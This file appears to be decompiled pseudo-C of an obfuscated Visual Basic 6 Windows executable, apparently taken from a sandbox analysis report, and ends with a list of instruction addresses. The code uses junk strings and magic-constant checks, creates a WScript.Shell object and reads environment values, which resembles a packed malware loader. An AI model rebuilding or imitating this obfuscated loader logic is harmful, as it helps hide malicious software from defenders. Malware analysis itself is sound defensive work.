				signed int _v412;
				signed int _v416;
				intOrPtr* _v420;
				signed int _v424;
				signed int _v428;
				intOrPtr* _v432;
				signed int _v436;
				signed int _v440;
				intOrPtr* _v444;
				signed int _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				signed int _v464;
				intOrPtr* _v468;
				signed int _v472;
				signed int _v476;
				intOrPtr* _v480;
				signed int _v484;
				signed int _v488;
				intOrPtr* _v492;
				signed int _v496;
				signed int _v500;
				intOrPtr* _v504;
				signed int _v508;
				signed int _v512;
				intOrPtr* _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				void* _t765;
				signed int _t766;
				signed int _t770;
				short _t774;
				signed int _t778;
				signed int _t781;
				signed int* _t786;
				signed int _t787;
				signed int _t796;
				char* _t798;
				signed int _t807;
				signed int* _t808;
				signed int _t815;
				signed int* _t822;
				signed int _t831;
				signed int _t842;
				signed int _t858;
				signed int _t868;
				short _t869;
				signed int _t876;
				char* _t883;
				void* _t886;
				signed int _t888;
				signed int _t889;
				short _t890;
				signed int _t896;
				signed int _t901;
				intOrPtr _t904;
				signed int _t909;
				short _t924;
				char* _t928;
				short _t929;
				signed int _t942;
				signed int _t947;
				char* _t953;
				signed int _t968;
				signed int _t973;
				signed int _t980;
				signed int _t989;
				signed int _t994;
				signed int _t1001;
				signed int _t1006;
				signed int _t1012;
				signed int _t1017;
				char* _t1020;
				char* _t1024;
				signed int* _t1025;
				signed int _t1033;
				signed int _t1038;
				signed int _t1045;
				signed int _t1056;
				signed int _t1061;
				void* _t1062;
				char* _t1109;
				void* _t1187;
				short _t1191;
				void* _t1195;
				void* _t1196;
				void* _t1198;
				intOrPtr _t1199;
				void* _t1200;
				signed int _t1201;
				void* _t1210;
				char* _t1255;

				_t1187 = __edi;
				_t1062 = __ebx;
				_t1196 = _t1198;
				_t1199 = _t1198 - 0x10;
				 *[fs:0x0] = _t1199;
				L00401320();
				_v20 = _t1199;
				_v16 = 0x4011f8;
				_v12 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v8 = 0;
				_t765 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401326, _t1195);
				L004015D8();
				L004015CC();
				_t766 =  &_v212;
				L004015D2();
				_v344 = _t766;
				_t770 =  *((intOrPtr*)( *_v344 + 0x1c))(_v344,  &_v336, _t766, _t765, 0);
				asm("fclex");
				_v348 = _t770;
				if(_v348 >= 0) {
					_v416 = _v416 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x410130);
					_push(_v344);
					_push(_v348);
					L004015C6();
					_v416 = _t770;
				}
				_v352 =  ~(0 | _v336 == 0x00063c83);
				L004015C0();
				_t774 = _v352;
				if(_t774 != 0) {
					_push(0xf6);
					_push(0xb);
					_push(0x37);
					L004015BA();
					_v336 = _t774;
					_v220 = _v336;
					_v228 = 3;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v228);
					L004015AE();
					L004015B4();
					L004015A8();
					if( *0x42f414 != 0) {
						_v420 = 0x42f414;
					} else {
						_push(0x42f414);
						_push(0x410160);
						L004015A2();
						_v420 = 0x42f414;
					}
					_v344 =  *_v420;
					_t1056 =  *((intOrPtr*)( *_v344 + 0x14))(_v344,  &_v212);
					asm("fclex");
					_v348 = _t1056;
					if(_v348 >= 0) {
						_v424 = _v424 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x410150);
						_push(_v344);
						_push(_v348);
						L004015C6();
						_v424 = _t1056;
					}
					_v352 = _v212;
					_t1061 =  *((intOrPtr*)( *_v352 + 0x78))(_v352,  &_v328);
					asm("fclex");
					_v356 = _t1061;
					if(_v356 >= 0) {
						_v428 = _v428 & 0x00000000;
					} else {
						_push(0x78);
						_push(0x410170);
						_push(_v352);
						_push(_v356);
						L004015C6();
						_v428 = _t1061;
					}
					_t774 = _v328;
					_v152 = _t774;
					L004015C0();
				}
				_push(0x1d);
				_push(0x2b);
				_push(0x34);
				L004015BA();
				_v284 = _t774;
				_v292 = 0x8003;
				_t1255 =  *0x4011f4;
				_v220 = _t1255;
				_v228 = 4;
				_push(0);
				_push( &_v228);
				_push( &_v244);
				L00401596();
				_push( &_v292);
				_t778 =  &_v244;
				_push(_t778);
				L0040159C();
				_v344 = _t778;
				_push( &_v244);
				_push( &_v228);
				_push(2);
				L00401590();
				_t1200 = _t1199 + 0xc;
				_t781 = _v344;
				if(_t781 != 0) {
					if( *0x42f414 != 0) {
						_v432 = 0x42f414;
					} else {
						_push(0x42f414);
						_push(0x410160);
						L004015A2();
						_v432 = 0x42f414;
					}
					_v344 =  *_v432;
					_t1033 =  *((intOrPtr*)( *_v344 + 0x14))(_v344,  &_v212);
					asm("fclex");
					_v348 = _t1033;
					if(_v348 >= 0) {
						_v436 = _v436 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x410150);
						_push(_v344);
						_push(_v348);
						L004015C6();
						_v436 = _t1033;
					}
					_v352 = _v212;
					_t1038 =  *((intOrPtr*)( *_v352 + 0x58))(_v352,  &_v192);
					asm("fclex");
					_v356 = _t1038;
					if(_v356 >= 0) {
						_v440 = _v440 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x410170);
						_push(_v352);
						_push(_v356);
						L004015C6();
						_v440 = _t1038;
					}
					_v372 = _v192;
					_v192 = _v192 & 0x00000000;
					L004015B4();
					L004015C0();
					if( *0x42f414 != 0) {
						_v444 = 0x42f414;
					} else {
						_push(0x42f414);
						_push(0x410160);
						L004015A2();
						_v444 = 0x42f414;
					}
					_v344 =  *_v444;
					_t1045 =  *((intOrPtr*)( *_v344 + 0x4c))(_v344,  &_v212);
					asm("fclex");
					_v348 = _t1045;
					if(_v348 >= 0) {
						_v448 = _v448 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x410150);
						_push(_v344);
						_push(_v348);
						L004015C6();
						_v448 = _t1045;
					}
					_v352 = _v212;
					_t781 =  *((intOrPtr*)( *_v352 + 0x28))(_v352);
					asm("fclex");
					_v356 = _t781;
					if(_v356 >= 0) {
						_v452 = _v452 & 0x00000000;
					} else {
						_push(0x28);
						_push(0x410180);
						_push(_v352);
						_push(_v356);
						L004015C6();
						_v452 = _t781;
					}
					L004015C0();
				}
				L0040158A();
				_push(0x75);
				_push(_v104);
				L0040157E();
				L004015B4();
				_push(_t781);
				_push(L"BRSTENBINDERNE");
				L00401584();
				asm("sbb eax, eax");
				_v344 =  ~( ~_t781 + 1);
				L00401578();
				if(_v344 != 0) {
					if( *0x42f414 != 0) {
						_v456 = 0x42f414;
					} else {
						_push(0x42f414);
						_push(0x410160);
						L004015A2();
						_v456 = 0x42f414;
					}
					_v344 =  *_v456;
					_t1012 =  *((intOrPtr*)( *_v344 + 0x14))(_v344,  &_v212);
					asm("fclex");
					_v348 = _t1012;
					if(_v348 >= 0) {
						_v460 = _v460 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x410150);
						_push(_v344);
						_push(_v348);
						L004015C6();
						_v460 = _t1012;
					}
					_v352 = _v212;
					_t1017 =  *((intOrPtr*)( *_v352 + 0xe8))(_v352,  &_v192);
					asm("fclex");
					_v356 = _t1017;
					if(_v356 >= 0) {
						_v464 = _v464 & 0x00000000;
					} else {
						_push(0xe8);
						_push(0x410170);
						_push(_v352);
						_push(_v356);
						L004015C6();
						_v464 = _t1017;
					}
					_v376 = _v192;
					_v192 = _v192 & 0x00000000;
					L004015B4();
					L004015C0();
					_push(0);
					_push(L"WScript.Shell");
					_push( &_v228);
					L00401566();
					_t1020 =  &_v228;
					_push(_t1020);
					L0040156C();
					_push(_t1020);
					_push( &_v88);
					L00401572();
					L004015A8();
					_v300 = L"WINDIR";
					_v308 = 8;
					_v268 = L"PROCESS";
					_v276 = 8;
					_push(0x10);
					L00401320();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(1);
					_push(L"Item");
					_push(0x10);
					L00401320();
					_t1187 = _t1200;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(1);
					_push(L"Environment");
					_push(_v88);
					_t1024 =  &_v228;
					_push(_t1024);
					L00401554();
					_push(_t1024);
					_t1025 =  &_v244;
					_push(_t1025);
					L0040155A();
					_push(_t1025);
					L00401560();
					L004015B4();
					_push( &_v244);
					_push( &_v228);
					_push(2);
					L00401590();
					_t1200 = _t1200 + 0x4c;
				}
				_push(L"Britska4");
				_t786 =  &_v196;
				_push(_t786);
				L0040154E();
				_push(_t786);
				_push(L"Citrous");
				_t787 =  &_v192;
				_push(_t787);
				L0040154E();
				_push(_t787); // executed
				E0040FF14(); // executed
				_v336 = _t787;
				L00401548();
				_v344 =  ~(0 | _v336 == 0x0008d073);
				_push( &_v196);
				_push( &_v192);
				_push(2);
				L00401542();
				_t1201 = _t1200 + 0xc;
				if(_v344 == 0) {
					L104:
					_v220 = 0x80020004;
					_v228 = 0xa;
					_push( &_v228);
					L00401518();
					_v340 = _t1255;
					L0040150C();
					_v236 = _v340;
					_v244 = 4;
					_push( &_v260);
					_t796 =  &_v244;
					_push(_t796);
					L00401512();
					_v344 = _t796;
					if(_v344 >= 0) {
						_v528 = _v528 & 0x00000000;
					} else {
						_push(_v344);
						L00401506();
						_v528 = _t796;
					}
					_t798 =  &_v260;
					L00401500();
					 *((intOrPtr*)( *_a4 + 0x714))(_a4, 0x25157c, _t798, _t798,  &_v336);
					_v56 = _v336;
					_push( &_v260);
					_push( &_v244);
					_push( &_v228);
					_push(3);
					L00401590();
					_v220 =  *E004011F0;
					_v228 = 4;
					_push( &_v244);
					_t807 =  &_v228;
					_push(_t807);
					L00401512();
					_v344 = _t807;
					if(_v344 >= 0) {
						_v532 = _v532 & 0x00000000;
					} else {
						_push(_v344);
						L00401506();
						_v532 = _t807;
					}
					_t808 =  &_v244;
					L00401500();
					_v340 = _t808;
					_v336 = 0x688f33;
					_v328 = 0x5bd9;
					_t815 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 0x47fa, L"Beadroll6",  &_v328, 0x6abb,  &_v336, L"Forladende4",  &_v340,  &_v332, _t808);
					_v348 = _t815;
					if(_v348 >= 0) {
						_v536 = _v536 & 0x00000000;
					} else {
						_push(0x6f8);
						_push(0x40fdbc);
						_push(_a4);
						_push(_v348);
						L004015C6();
						_v536 = _t815;
					}
					_v72 = _v332;
					L00401590();
					_v220 = 0xfc;
					_v228 = 2;
					L004014FA();
					L004015B4();
					L0040158A();
					_v392 = _v200;
					_v200 = _v200 & 0x00000000;
					_t822 =  &_v196;
					L004015B4();
					 *((intOrPtr*)( *_a4 + 0x718))(_a4, _t822, _t822, L"Gruesomest",  &_v336,  &_v228, 2,  &_v228,  &_v244);
					_v160 = _v336;
					L00401542();
					L004015A8();
					L004014F4();
					L004015B4();
					_v220 = 0x12;
					_v228 = 2;
					_t831 =  &_v244;
					L004014EE();
					L004014E8();
					L004015B4();
					L004014E2();
					_v336 = _t831;
					_v396 = _v208;
					_v208 = _v208 & 0x00000000;
					L004015B4();
					L00401560();
					L004015B4();
					_v400 = _v204;
					_v204 = _v204 & 0x00000000;
					L004015B4();
					_t842 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v192,  &_v196,  &_v200,  &_v336,  &_v328,  &_v244, L"Desserttallerken", L"Vrvl9", _t831,  &_v228, 3,  &_v192,  &_v196,  &_v200);
					_v344 = _t842;
					if(_v344 >= 0) {
						_v540 = _v540 & 0x00000000;
					} else {
						_push(0x6fc);
						_push(0x40fdbc);
						_push(_a4);
						_push(_v344);
						L004015C6();
						_v540 = _t842;
					}
					_v68 = _v328;
					L00401542();
					L00401590();
					_v220 = 0x4d025;
					_v228 = 3;
					L004014DC();
					L004015B4();
					L0040158A();
					_v328 = 0x36c2;
					_v404 = _v200;
					_v200 = _v200 & 0x00000000;
					L004015B4();
					_t858 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v192, L"Comose9",  &_v328, 0x67a5e5,  &_v196,  &_v228, 2,  &_v228,  &_v244, 5,  &_v192,  &_v196,  &_v200,  &_v204,  &_v208);
					_v344 = _t858;
					if(_v344 >= 0) {
						_v544 = _v544 & 0x00000000;
					} else {
						_push(0x704);
						_push(0x40fdbc);
						_push(_a4);
						_push(_v344);
						L004015C6();
						_v544 = _t858;
					}
					L00401542();
					L004015A8();
					L0040158A();
					_v340 = 0x2728f0;
					_v336 = 0x4dccd4;
					_t868 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v336,  &_v340, L"SNORE",  &_v192,  &_v196, 3,  &_v192,  &_v196,  &_v200);
					_v344 = _t868;
					if(_v344 >= 0) {
						_v548 = _v548 & 0x00000000;
					} else {
						_push(0x708);
						_push(0x40fdbc);
						_push(_a4);
						_push(_v344);
						L004015C6();
						_v548 = _t868;
					}
					_t869 = _v196;
					_v408 = _t869;
					_v196 = _v196 & 0x00000000;
					L004015B4();
					L00401578();
					L00401536();
					L004015B4();
					L004014D0();
					L004015B4();
					L004014D6();
					_v332 = _t869;
					_v328 = _v332;
					_v412 = _v200;
					_v200 = _v200 & 0x00000000;
					L004015B4();
					_t876 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v196,  &_v328, 0x324920, _t869, 0x38f5, 0xa);
					_v344 = _t876;
					if(_v344 >= 0) {
						_v552 = _v552 & 0x00000000;
					} else {
						_push(0x70c);
						_push(0x40fdbc);
						_push(_a4);
						_push(_v344);
						L004015C6();
						_v552 = _t876;
					}
					L00401542();
					E0042D836();
					_v268 = 2;
					_v276 = 2;
					L004014CA();
					_v268 = 0x8219e6;
					_v276 = 3;
					L004014CA();
					_t883 =  &_v228;
					L004014C4();
					L00401500();
					_t886 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4, _t883, _t883, _t883,  &_v44,  &_v176, 3,  &_v192,  &_v196,  &_v200);
					_v12 = 0;
					asm("wait");
					_push(0x42b933);
					L004015A8();
					L00401578();
					L00401578();
					L004015C0();
					L00401578();
					L00401578();
					L00401578();
					L00401578();
					L00401578();
					L00401578();
					L00401578();
					L00401578();
					L00401578();
					L00401578();
					L004015A8();
					L00401578();
					L00401578();
					L00401578();
					return _t886;
				} else {
					_push(L"20:20:20");
					_push( &_v228);
					L0040153C();
					_t888 =  &_v228;
					_push(_t888);
					L00401560();
					L004015B4();
					L004015A8();
					_push(0x15);
					L00401536();
					L004015B4();
					E0040FF78();
					_v336 = _t888;
					L00401548();
					if(_v336 == 0x454fae) {
						if( *0x42f414 != 0) {
							_v468 = 0x42f414;
						} else {
							_push(0x42f414);
							_push(0x410160);
							L004015A2();
							_v468 = 0x42f414;
						}
						_v344 =  *_v468;
						_t989 =  *((intOrPtr*)( *_v344 + 0x14))(_v344,  &_v212);
						asm("fclex");
						_v348 = _t989;
						if(_v348 >= 0) {
							_v472 = _v472 & 0x00000000;
						} else {
							_push(0x14);
							_push(0x410150);
							_push(_v344);
							_push(_v348);
							L004015C6();
							_v472 = _t989;
						}
						_v352 = _v212;
						_t994 =  *((intOrPtr*)( *_v352 + 0x110))(_v352,  &_v192);
						asm("fclex");
						_v356 = _t994;
						if(_v356 >= 0) {
							_v476 = _v476 & 0x00000000;
						} else {
							_push(0x110);
							_push(0x410170);
							_push(_v352);
							_push(_v356);
							L004015C6();
							_v476 = _t994;
						}
						_v380 = _v192;
						_v192 = _v192 & 0x00000000;
						L004015B4();
						L004015C0();
						if( *0x42f414 != 0) {
							_v480 = 0x42f414;
						} else {
							_push(0x42f414);
							_push(0x410160);
							L004015A2();
							_v480 = 0x42f414;
						}
						_v344 =  *_v480;
						_t1001 =  *((intOrPtr*)( *_v344 + 0x14))(_v344,  &_v212);
						asm("fclex");
						_v348 = _t1001;
						if(_v348 >= 0) {
							_v484 = _v484 & 0x00000000;
						} else {
							_push(0x14);
							_push(0x410150);
							_push(_v344);
							_push(_v348);
							L004015C6();
							_v484 = _t1001;
						}
						_v352 = _v212;
						_t1006 =  *((intOrPtr*)( *_v352 + 0x140))(_v352,  &_v328);
						asm("fclex");
						_v356 = _t1006;
						if(_v356 >= 0) {
							_v488 = _v488 & 0x00000000;
						} else {
							_push(0x140);
							_push(0x410170);
							_push(_v352);
							_push(_v356);
							L004015C6();
							_v488 = _t1006;
						}
						_t888 = _v328;
						_v60 = _t888;
						L004015C0();
					}
					_t1109 = 0x5a;
					L00401530();
					_push(_t888);
					E0040FFC0();
					_v336 = _t888;
					L00401548();
					if(_v336 == 0x8751e1) {
						if( *0x42f414 != 0) {
							_v492 = 0x42f414;
						} else {
							_push(0x42f414);
							_push(0x410160);
							L004015A2();
							_v492 = 0x42f414;
						}
						_v344 =  *_v492;
						_t968 =  *((intOrPtr*)( *_v344 + 0x14))(_v344,  &_v212);
						asm("fclex");
						_v348 = _t968;
						if(_v348 >= 0) {
							_v496 = _v496 & 0x00000000;
						} else {
							_push(0x14);
							_push(0x410150);
							_push(_v344);
							_push(_v348);
							L004015C6();
							_v496 = _t968;
						}
						_v352 = _v212;
						_t973 =  *((intOrPtr*)( *_v352 + 0xd0))(_v352,  &_v192);
						asm("fclex");
						_v356 = _t973;
						if(_v356 >= 0) {
							_v500 = _v500 & 0x00000000;
						} else {
							_push(0xd0);
							_push(0x410170);
							_push(_v352);
							_push(_v356);
							L004015C6();
							_v500 = _t973;
						}
						_v384 = _v192;
						_v192 = _v192 & 0x00000000;
						L004015B4();
						L004015C0();
						if( *0x42f414 != 0) {
							_v504 = 0x42f414;
						} else {
							_push(0x42f414);
							_push(0x410160);
							L004015A2();
							_v504 = 0x42f414;
						}
						_v344 =  *_v504;
						_t980 =  *((intOrPtr*)( *_v344 + 0x14))(_v344,  &_v212);
						asm("fclex");
						_v348 = _t980;
						if(_v348 >= 0) {
							_v508 = _v508 & 0x00000000;
						} else {
							_push(0x14);
							_push(0x410150);
							_push(_v344);
							_push(_v348);
							L004015C6();
							_v508 = _t980;
						}
						_v352 = _v212;
						_t888 =  *((intOrPtr*)( *_v352 + 0x138))(_v352, L"Doserende6", 1);
						asm("fclex");
						_v356 = _t888;
						if(_v356 >= 0) {
							_v512 = _v512 & 0x00000000;
						} else {
							_push(0x138);
							_push(0x410170);
							_push(_v352);
							_push(_v356);
							L004015C6();
							_v512 = _t888;
						}
						_t1109 =  &_v212;
						L004015C0();
					}
					_push(0x7645e8);
					E00410014();
					_v336 = _t888;
					L00401548();
					_push(0x86);
					_push(0x9c);
					_push(0xbe);
					L004015BA();
					if(_v336 == _t888) {
						_push(0xf8);
						L00401536();
						L004015B4();
						_push(0);
						_push(0xffffffff);
						_push(1);
						_push(L"chinotti");
						_push(L"Cataphora5");
						_push(L"Incestuses");
						L0040152A();
						_t1109 =  &_v120;
						L004015B4();
					}
					_t889 =  &_v84;
					_push(_t889);
					E0041006C();
					_v336 = _t889;
					L00401548();
					if(_v336 == 0x7c23f8) {
						_push(_v184);
						_push(L"chassis");
						L00401524();
						L004015B4();
						_push(L"Svalebajernes");
						L0040151E();
						_t1109 =  &_v92;
						L004015B4();
					}
					_t890 =  &_v140;
					_push(_t890);
					E004100CC();
					_v328 = _t890;
					L00401548();
					_t1191 = _v328;
					_push(0x89);
					_push(0x22);
					_push(0x75);
					L004015BA();
					if(_t1191 == _t890) {
						while(_v96 < 0x31) {
							_t904 = _v96 + 1;
							if(_t904 < 0) {
								L004014BE();
								_push(_t1196);
								_push(_t1109);
								_push(_t1109);
								_push(0x401326);
								_push( *[fs:0x0]);
								 *[fs:0x0] = _t1201;
								L00401320();
								_push(_t1062);
								_push(_t1191);
								_push(_t1187);
								_v204 = _t1201;
								_v200 = 0x401208;
								_v272 = 0x53d8;
								_v280 = 2;
								_push( &_v280);
								L004014B8();
								L004015B4();
								_v256 = 0x619d;
								_v264 = 2;
								_v388 = _v244;
								_v244 = _v244 & 0x00000000;
								_t909 =  &_v264;
								_push(_t909);
								L004014B8();
								L004015B4();
								_push(_t909);
								_push(0xc9);
								L004015B4();
								_push(_t909);
								L004014B2();
								L004015B4();
								_push(_t909);
								L00401584();
								asm("sbb eax, eax");
								_v368 =  ~( ~( ~_t909));
								_push( &_v244);
								_push( &_v240);
								_push( &_v236);
								_push( &_v232);
								_push(4);
								L00401542();
								_push( &_v280);
								_push( &_v264);
								_push(2);
								L00401590();
								_t1210 = _t1201 + 0x20;
								if(_v368 != 0) {
									if( *0x42f414 != 0) {
										_v208 = 0x42f414;
									} else {
										_push(0x42f414);
										_push(0x410160);
										L004015A2();
										_v208 = 0x42f414;
									}
									_v180 =  *_v208;
									_t942 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v60);
									asm("fclex");
									_v184 = _t942;
									if(_v184 >= 0) {
										_v212 = _v212 & 0x00000000;
									} else {
										_push(0x14);
										_push(0x410150);
										_push(_v180);
										_push(_v184);
										L004015C6();
										_v212 = _t942;
									}
									_v188 = _v60;
									_t947 =  *((intOrPtr*)( *_v188 + 0xb8))(_v188,  &_v176);
									asm("fclex");
									_v192 = _t947;
									if(_v192 >= 0) {
										_v216 = _v216 & 0x00000000;
									} else {
										_push(0xb8);
										_push(0x410170);
										_push(_v188);
										_push(_v192);
										L004015C6();
										_v216 = _t947;
									}
									_v28 = _v176;
									L004015C0();
									_v132 = 0x410444;
									_v140 = 8;
									L0040149A();
									_push( &_v76);
									_push( &_v92);
									L004014A0();
									_v148 = L"\\BjI2RLSgpKif0Adi181";
									_v156 = 8;
									_push( &_v92);
									_push( &_v156);
									_t953 =  &_v108;
									_push(_t953);
									L004014A6();
									_push(_t953);
									L00401560();
									L004015B4();
									_push(_t953);
									_push(1);
									_push(0xffffffff);
									_push(0x20);
									L004014AC();
									L00401578();
									_push( &_v108);
									_push( &_v92);
									_push( &_v76);
									_push(3);
									L00401590();
									_v148 = L"Unbetide";
									_v156 = 8;
									L0040149A();
									_push(0xad);
									_push( &_v76);
									_push( &_v92);
									L00401494();
									_push(1);
									_push( &_v92);
									_push(0xffffffff);
									L0040148E();
									_push( &_v92);
									_push( &_v76);
									_push(2);
									L00401590();
									_t1210 = _t1210 + 0x1c;
									_push(1);
									L00401488();
								}
								_push(L"Besvige");
								_push(L"Fantasirig");
								_push( &_v76); // executed
								L0040147C(); // executed
								_v132 = L"windir";
								_v140 = 8;
								L0040149A();
								_push( &_v92);
								_push( &_v108);
								L004014A0();
								_push( &_v76);
								_t924 =  &_v108;
								_push(_t924);
								L00401482();
								_v180 = _t924;
								_push( &_v108);
								_push( &_v76);
								_push( &_v92);
								_push(3);
								L00401590();
								_t928 = _v180;
								if(_t928 != 0) {
									_v68 = 0x80020004;
									_v76 = 0xa;
									_t929 =  &_v76;
									_push(_t929);
									L00401476();
									_v32 = _t929;
									L004015A8();
									_v132 = 0x80020004;
									_v140 = 0xa;
									_push(0x10);
									L00401320();
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_push(L"Ramshackly5");
									_push(L"DOKUMENTTYPEN");
									_push(L"Swingpjatter");
									L00401470();
									L004015B4();
									_v204 = _v44;
									_v44 = _v44 & 0x00000000;
									_v68 = _v204;
									_v76 = 8;
									_push(0x1c);
									_push( &_v76);
									_push( &_v92);
									L00401494();
									_push( &_v92);
									L00401560();
									L004015B4();
									L00401578();
									_push( &_v92);
									_t928 =  &_v76;
									_push(_t928);
									_push(2);
									L00401590();
								}
								_push(0x86);
								_push(0x60);
								_push(0x4e);
								L004015BA();
								_v40 = _t928;
								_push(0x42bdc1);
								L00401578();
								return _t928;
							} else {
								_v96 = _t904;
								continue;
							}
							goto L142;
						}
						if( *0x42f414 != 0) {
							_v516 = 0x42f414;
						} else {
							_push(0x42f414);
							_push(0x410160);
							L004015A2();
							_v516 = 0x42f414;
						}
						_v344 =  *_v516;
						_t896 =  *((intOrPtr*)( *_v344 + 0x14))(_v344,  &_v212);
						asm("fclex");
						_v348 = _t896;
						if(_v348 >= 0) {
							_v520 = _v520 & 0x00000000;
						} else {
							_push(0x14);
							_push(0x410150);
							_push(_v344);
							_push(_v348);
							L004015C6();
							_v520 = _t896;
						}
						_v352 = _v212;
						_t901 =  *((intOrPtr*)( *_v352 + 0xe0))(_v352,  &_v192);
						asm("fclex");
						_v356 = _t901;
						if(_v356 >= 0) {
							_v524 = _v524 & 0x00000000;
						} else {
							_push(0xe0);
							_push(0x410170);
							_push(_v352);
							_push(_v356);
							L004015C6();
							_v524 = _t901;
						}
						_v388 = _v192;
						_v192 = _v192 & 0x00000000;
						L004015B4();
						L004015C0();
					}
					goto L104;
				}
				L142:
			}

0x0042a294
0x0042a294
0x0042a295
0x0042a297
0x0042a2a6
0x0042a2b2
0x0042a2ba
0x0042a2bd
0x0042a2ca
0x0042a2d3
0x0042a2d6
0x0042a2e5
0x0042a2ea
0x0042a2ef
0x0042a2f5
0x0042a2fc
0x0042a301
0x0042a31c
0x0042a31f
0x0042a321
0x0042a32e
0x0042a350
0x0042a330
0x0042a330
0x0042a332
0x0042a337
0x0042a33d
0x0042a343
0x0042a348
0x0042a348
0x0042a368
0x0042a375
0x0042a37a
0x0042a383
0x0042a389
0x0042a38e
0x0042a390
0x0042a392
0x0042a397
0x0042a3a3
0x0042a3a9
0x0042a3b3
0x0042a3b5
0x0042a3b7
0x0042a3b9
0x0042a3c1
0x0042a3c2
0x0042a3cc
0x0042a3d7
0x0042a3e3
0x0042a400
0x0042a3e5
0x0042a3e5
0x0042a3ea
0x0042a3ef
0x0042a3f4
0x0042a3f4
0x0042a412
0x0042a42d
0x0042a430
0x0042a432
0x0042a43f
0x0042a461
0x0042a441
0x0042a441
0x0042a443
0x0042a448
0x0042a44e
0x0042a454
0x0042a459
0x0042a459
0x0042a46e
0x0042a489
0x0042a48c
0x0042a48e
0x0042a49b
0x0042a4bd
0x0042a49d
0x0042a49d
0x0042a49f
0x0042a4a4
0x0042a4aa
0x0042a4b0
0x0042a4b5
0x0042a4b5
0x0042a4c4
0x0042a4cb
0x0042a4d8
0x0042a4d8
0x0042a4dd
0x0042a4df
0x0042a4e1
0x0042a4e3
0x0042a4e8
0x0042a4ee
0x0042a4f8
0x0042a4fe
0x0042a504
0x0042a50e
0x0042a516
0x0042a51d
0x0042a51e
0x0042a529
0x0042a52a
0x0042a530
0x0042a531
0x0042a536
0x0042a543
0x0042a54a
0x0042a54b
0x0042a54d
0x0042a552
0x0042a555
0x0042a55e
0x0042a56b
0x0042a588
0x0042a56d
0x0042a56d
0x0042a572
0x0042a577
0x0042a57c
0x0042a57c
0x0042a59a
0x0042a5b5
0x0042a5b8
0x0042a5ba
0x0042a5c7
0x0042a5e9
0x0042a5c9
0x0042a5c9
0x0042a5cb
0x0042a5d0
0x0042a5d6
0x0042a5dc
0x0042a5e1
0x0042a5e1
0x0042a5f6
0x0042a611
0x0042a614
0x0042a616
0x0042a623
0x0042a645
0x0042a625
0x0042a625
0x0042a627
0x0042a62c
0x0042a632
0x0042a638
0x0042a63d
0x0042a63d
0x0042a652
0x0042a658
0x0042a668
0x0042a673
0x0042a67f
0x0042a69c
0x0042a681
0x0042a681
0x0042a686
0x0042a68b
0x0042a690
0x0042a690
0x0042a6ae
0x0042a6c9
0x0042a6cc
0x0042a6ce
0x0042a6db
0x0042a6fd
0x0042a6dd
0x0042a6dd
0x0042a6df
0x0042a6e4
0x0042a6ea
0x0042a6f0
0x0042a6f5
0x0042a6f5
0x0042a70a
0x0042a71e
0x0042a721
0x0042a723
0x0042a730
0x0042a752
0x0042a732
0x0042a732
0x0042a734
0x0042a739
0x0042a73f
0x0042a745
0x0042a74a
0x0042a74a
0x0042a75f
0x0042a75f
0x0042a76c
0x0042a771
0x0042a773
0x0042a776
0x0042a783
0x0042a788
0x0042a789
0x0042a78e
0x0042a795
0x0042a79a
0x0042a7a7
0x0042a7b5
0x0042a7c2
0x0042a7df
0x0042a7c4
0x0042a7c4
0x0042a7c9
0x0042a7ce
0x0042a7d3
0x0042a7d3
0x0042a7f1
0x0042a80c
0x0042a80f
0x0042a811
0x0042a81e
0x0042a840
0x0042a820
0x0042a820
0x0042a822
0x0042a827
0x0042a82d
0x0042a833
0x0042a838
0x0042a838
0x0042a84d
0x0042a868
0x0042a86e
0x0042a870
0x0042a87d
0x0042a8a2
0x0042a87f
0x0042a87f
0x0042a884
0x0042a889
0x0042a88f
0x0042a895
0x0042a89a
0x0042a89a
0x0042a8af
0x0042a8b5
0x0042a8c8
0x0042a8d3
0x0042a8d8
0x0042a8da
0x0042a8e5
0x0042a8e6
0x0042a8eb
0x0042a8f1
0x0042a8f2
0x0042a8f7
0x0042a8fb
0x0042a8fc
0x0042a907
0x0042a90c
0x0042a916
0x0042a920
0x0042a92a
0x0042a934
0x0042a937
0x0042a944
0x0042a945
0x0042a946
0x0042a947
0x0042a948
0x0042a94a
0x0042a94f
0x0042a952
0x0042a95d
0x0042a95f
0x0042a960
0x0042a961
0x0042a962
0x0042a963
0x0042a965
0x0042a96a
0x0042a96d
0x0042a973
0x0042a974
0x0042a97c
0x0042a97d
0x0042a983
0x0042a984
0x0042a98c
0x0042a98d
0x0042a99a
0x0042a9a5
0x0042a9ac
0x0042a9ad
0x0042a9af
0x0042a9b4
0x0042a9b4
0x0042a9b7
0x0042a9bc
0x0042a9c2
0x0042a9c3
0x0042a9c8
0x0042a9c9
0x0042a9ce
0x0042a9d4
0x0042a9d5
0x0042a9da
0x0042a9db
0x0042a9e0
0x0042a9e6
0x0042a9fc
0x0042aa09
0x0042aa10
0x0042aa11
0x0042aa13
0x0042aa18
0x0042aa24
0x0042b117
0x0042b117
0x0042b121
0x0042b131
0x0042b132
0x0042b137
0x0042b143
0x0042b148
0x0042b14e
0x0042b15e
0x0042b15f
0x0042b165
0x0042b166
